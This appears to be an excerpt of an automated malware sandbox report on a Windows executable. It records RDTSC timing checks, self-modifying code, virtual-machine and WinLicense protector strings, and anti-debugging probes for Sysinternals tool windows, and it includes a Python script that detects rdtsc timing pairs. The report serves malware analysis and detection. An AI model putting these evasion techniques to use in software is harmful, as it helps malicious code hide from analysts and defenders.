                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F115DA second address: F115F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jp 00007F5408C21106h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F115F0 second address: F115F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1B5FB second address: F1B608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jnp 00007F5408C21106h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DB3D second address: F1DB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2106F second address: F21077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21077 second address: F2107B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29150 second address: F29154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29154 second address: F29166 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5408F96886h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29166 second address: F29185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21119h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F296C4 second address: F296DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F5408F96886h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pushad 0x00000010 jbe 00007F5408F96886h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F29968 second address: F2996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2996F second address: F29975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F29ABF second address: F29AF1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C21112h 0x00000008 jng 00007F5408C21106h 0x0000000e ja 00007F5408C21106h 0x00000014 pushad 0x00000015 jmp 00007F5408C21119h 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F29AF1 second address: F29B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F5408F96890h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5408F96899h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F29B28 second address: F29B2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F2A525 second address: F2A52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F2A52B second address: F2A56C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5408C2110Eh 0x00000012 pushad 0x00000013 jp 00007F5408C21106h 0x00000019 jmp 00007F5408C21117h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F2E19D second address: F2E1A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5408F9688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F2DD15 second address: F2DD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F2DD19 second address: F2DD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5408F96886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F5408F96888h 0x00000012 popad 0x00000013 push ecx 0x00000014 jbe 00007F5408F9688Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F364DF second address: F3650E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5408C2110Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5408C21111h 0x00000013 jl 00007F5408C21106h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F3C282 second address: F3C2AC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408F96886h 0x00000008 jc 00007F5408F96886h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F5408F96894h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F3C2AC second address: F3C2B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F39A28 second address: F39A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F39A2C second address: F39A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F39A32 second address: F39A46 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5408F9688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F39A46 second address: F39A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push edi 0x0000000a jmp 00007F5408C2110Ah 0x0000000f pop edi 0x00000010 pushad 0x00000011 jmp 00007F5408C21119h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F49DC2 second address: F49DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F5408F9688Ah 0x0000000d jmp 00007F5408F9688Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F59C0F second address: F59C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F58DCF second address: F58DD4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5908F second address: F590A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F5408C21106h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F590A7 second address: F590D3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5408F9688Ah 0x0000000c jnp 00007F5408F96886h 0x00000012 jmp 00007F5408F9688Eh 0x00000017 jp 00007F5408F96886h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F590D3 second address: F590D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F594FD second address: F59509 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnp 00007F5408F96886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5969A second address: F596A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F596A0 second address: F596AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F596AA second address: F596AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F596AE second address: F596B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5B2A6 second address: F5B2D0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C21112h 0x00000008 push esi 0x00000009 js 00007F5408C21106h 0x0000000f ja 00007F5408C21106h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5B2D0 second address: F5B2F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007F5408F96886h 0x0000000d jmp 00007F5408F96897h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5CB03 second address: F5CB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5CB07 second address: F5CB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5CB0D second address: F5CB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5F3F4 second address: F5F3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5F502 second address: F5F510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F5408C21106h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5F7D5 second address: F5F7DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F5F7DA second address: F5F7EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jo 00007F5408C2110Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F60DA9 second address: F60DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F60DAF second address: F60DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F629B9 second address: F629BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F629BD second address: F629C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F629C3 second address: F629CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5408F96886h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F629CD second address: F629D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: F644F2 second address: F6450A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5408F9688Eh 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C302A2 second address: 4C302A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C302A8 second address: 4C302AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C302AC second address: 4C302CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5408C2110Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C302CD second address: 4C302D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C302D1 second address: 4C302D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C302D7 second address: 4C30313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, al 0x00000005 pushfd 0x00000006 jmp 00007F5408F96899h 0x0000000b adc al, FFFFFFC6h 0x0000000e jmp 00007F5408F96891h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C30313 second address: 4C3037B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 58h 0x00000006 popad 0x00000007 call 00007F5408C21114h 0x0000000c pushfd 0x0000000d jmp 00007F5408C21112h 0x00000012 adc esi, 468154C8h 0x00000018 jmp 00007F5408C2110Bh 0x0000001d popfd 0x0000001e pop eax 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F5408C2110Fh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F5408C21110h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C3037B second address: 4C30381 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4C30381 second address: 4C30387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E83819 second address: E83823 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5408F96886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CD17E2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CCF39E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EA2855 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CD16EC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A838B0 | wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A84910 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7DA80 | FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7E430 | FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7ED20 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A84570 | GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A83EA0 | wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7F6B0 | FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A716D0 | FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7DE10 | FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7BE70 | FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A71160 | GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8so%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000002.1297365011.00000000006F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13585
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13598
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13588
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13603
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13639
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
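The RDTSC interceptor rows above all have the same shape: two rdtsc reads a handful of bytes apart with only stack-neutral junk (push/pop, pushad/popad, short jumps) between them. The protector compares the two timestamps and treats a stretched gap as evidence of single-stepping or emulation. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that finds such rdtsc sandwiches statically in a raw code blob, decodes the filler, and prints each hit in the same first/second address form used above. The input bytes are constructed here from the opcodes of three of the rows, and the 64-byte pairing window is an assumed threshold.

```python
"""Find rdtsc sandwiches in raw x86 code (added example; input is constructed).

A sandwich is two rdtsc (0F 31) reads a few bytes apart with only
stack-neutral junk between them; the protector diffs EDX:EAX across the
pair and bails out when a debugger or emulator has stretched the gap.
"""
from typing import List, Tuple

RDTSC = b"\x0f\x31"
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
ONE_BYTE = {0x60: "pushad", 0x61: "popad", 0x9C: "pushfd", 0x9D: "popfd"}
# Short conditional jumps, opcodes 0x70..0x7F, named as the report prints them.
JCC = {0x70: "jo", 0x71: "jno", 0x72: "jc", 0x73: "jnc", 0x74: "je", 0x75: "jne",
       0x76: "jbe", 0x77: "ja", 0x78: "js", 0x79: "jns", 0x7A: "jp", 0x7B: "jnp",
       0x7C: "jl", 0x7D: "jge", 0x7E: "jng", 0x7F: "jg"}

Filler = List[Tuple[int, str]]  # (offset relative to the first rdtsc, mnemonic)


def decode_filler(code: bytes, first: int, second: int) -> Filler:
    """Decode the bytes between two rdtsc reads.

    Only the single-byte stack junk and rel8 jumps that appear in the
    report are decoded; anything else becomes 'db' so the walk never
    desyncs past the second rdtsc.
    """
    out: Filler = []
    i = first + 2  # step over the first rdtsc
    while i < second:
        b = code[i]
        if 0x50 <= b <= 0x57:
            out.append((i - first, f"push {REG32[b - 0x50]}"))
            i += 1
        elif 0x58 <= b <= 0x5F:
            out.append((i - first, f"pop {REG32[b - 0x58]}"))
            i += 1
        elif b in ONE_BYTE:
            out.append((i - first, ONE_BYTE[b]))
            i += 1
        elif (b == 0xEB or b in JCC) and i + 1 < second:
            rel = int.from_bytes(code[i + 1:i + 2], "little", signed=True)
            out.append((i - first, f"{'jmp' if b == 0xEB else JCC[b]} {rel:+d}"))
            i += 2
        else:
            out.append((i - first, f"db 0x{b:02x}"))
            i += 1
    return out


def find_rdtsc_pairs(code: bytes, base: int = 0, window: int = 64):
    """Return (first_addr, second_addr, filler) for every consecutive rdtsc
    pair closer than `window` bytes; `base` is the load address to print.
    The 64-byte window is an assumed threshold, not a value from the report."""
    offsets = []
    pos = code.find(RDTSC)
    while pos != -1:
        offsets.append(pos)
        pos = code.find(RDTSC, pos + 2)
    return [(base + a, base + b, decode_filler(code, a, b))
            for a, b in zip(offsets, offsets[1:]) if b - a <= window]


def format_pair(first: int, second: int, filler: Filler) -> str:
    """Render one hit in the same shape as the interceptor rows above."""
    listing = [(0, "rdtsc"), *filler, (second - first, "rdtsc")]
    body = " ".join(f"0x{off:08x} {mn}" for off, mn in listing)
    return f"First address: {first:X} second address: {second:X} instructions: {body}"


# Constructed code blob (not bytes from the sample) built from the opcodes of
# three consecutive rows above: rdtsc/push eax/push edx, then rdtsc/pop edx/
# pop eax/pop edx/pop eax, then rdtsc/jp/push eax/push edx/pushad/popad,
# closed by a final rdtsc; int3 padding and a lone rdtsc follow.
SAMPLE_CODE = (
    bytes.fromhex("0f31 50 52")
    + bytes.fromhex("0f31 5a 58 5a 58")
    + bytes.fromhex("0f31 7a02 50 52 60 61")
    + bytes.fromhex("0f31")
    + b"\xcc" * 100
    + bytes.fromhex("0f31")
)

if __name__ == "__main__":
    for hit in find_rdtsc_pairs(SAMPLE_CODE, base=0xF29B28):
        print(format_pair(*hit))
```

Run against a dumped code section (the unpacked image, not the packed file on disk, since the protector's code is only present after unpacking) with `base` set to the section's virtual address; a dense run of pairs like the one above is a reliable marker of a timing-check layer, while an isolated rdtsc is normal compiler or profiler output.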

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
